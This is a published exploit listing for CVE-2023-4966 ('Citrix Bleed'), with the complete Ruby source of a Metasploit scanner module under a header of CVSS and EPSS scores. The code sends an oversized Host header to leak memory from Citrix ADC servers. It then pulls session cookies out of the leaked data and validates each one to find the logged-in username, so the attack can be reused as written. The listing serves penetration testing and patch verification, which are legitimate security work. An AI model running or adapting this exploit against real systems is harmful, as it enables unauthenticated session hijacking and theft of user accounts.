Citrix ADC (NetScaler) Bleed Scanner

2024-09-0100:00:00

Spencer McIntyre, Dylan Pindur, metasploit.com

packetstormsecurity.com

metasploit

citrix adc

memory leakage

session cookies

vulnerability

hijacking

remote attack

unauthenticated

cve-2023-4966

CVSS3

9.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

AI Score

7.3

Confidence

Low

EPSS

0.971

Percentile

99.8%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
  
COOKIE_NAME = 'NSC_AAAC'.freeze  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Citrix ADC (NetScaler) Bleed Scanner',  
'Description' => %q{  
This module scans for a vulnerability that allows a remote, unauthenticated attacker to leak memory for a  
target Citrix ADC server. The leaked memory is then scanned for session cookies which can be hijacked if found.  
},  
'Author' => [  
'Dylan Pindur', # original assetnote writeup  
'Spencer McIntyre' # metasploit module  
],  
'References' => [  
['CVE', '2023-4966'],  
['URL', 'https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966']  
],  
'DisclosureDate' => '2023-10-25',  
'License' => MSF_LICENSE,  
'Notes' => {  
'Stability' => [],  
'Reliability' => [],  
'SideEffects' => [],  
'AKA' => ['Citrix Bleed']  
},  
'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'Base path', '/'])  
])  
end  
  
def get_user_for_cookie(cookie)  
vprint_status("#{peer} - Checking cookie: #{cookie}")  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'logon/LogonPoint/Authentication/GetUserName'),  
'headers' => {  
'Cookie' => "#{COOKIE_NAME}=#{cookie}"  
}  
)  
return nil unless res&.code == 200  
  
res.body.strip  
end  
  
def run_host(_target_host)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'oauth/idp/.well-known/openid-configuration'),  
'headers' => {  
'Host' => Rex::Text.rand_text_alpha(24812),  
'Connection' => 'close'  
}  
)  
return nil unless res&.code == 200  
return nil unless res.headers['Content-Type'].present?  
return nil unless res.headers['Content-Type'].downcase.start_with?('application/json')  
  
username = nil  
res.body.scan(/([0-9a-f]{32,65})/i).each do |cookie|  
cookie = cookie.first  
username = get_user_for_cookie(cookie)  
next unless username  
  
print_good("#{peer} - Cookie: #{COOKIE_NAME}=#{cookie} Username: #{username}")  
report_vuln  
end  
  
return if username  
  
begin  
JSON.parse(res.body)  
rescue JSON::ParserError  
print_status("#{peer} - The target is vulnerable but no valid cookies were leaked.")  
report_vuln  
else  
print_status("#{peer} - The target does not appear vulnerable.")  
end  
end  
  
def report_vuln  
super(  
host: rhost,  
port: rport,  
name: name,  
refs: references  
)  
end  
end  
`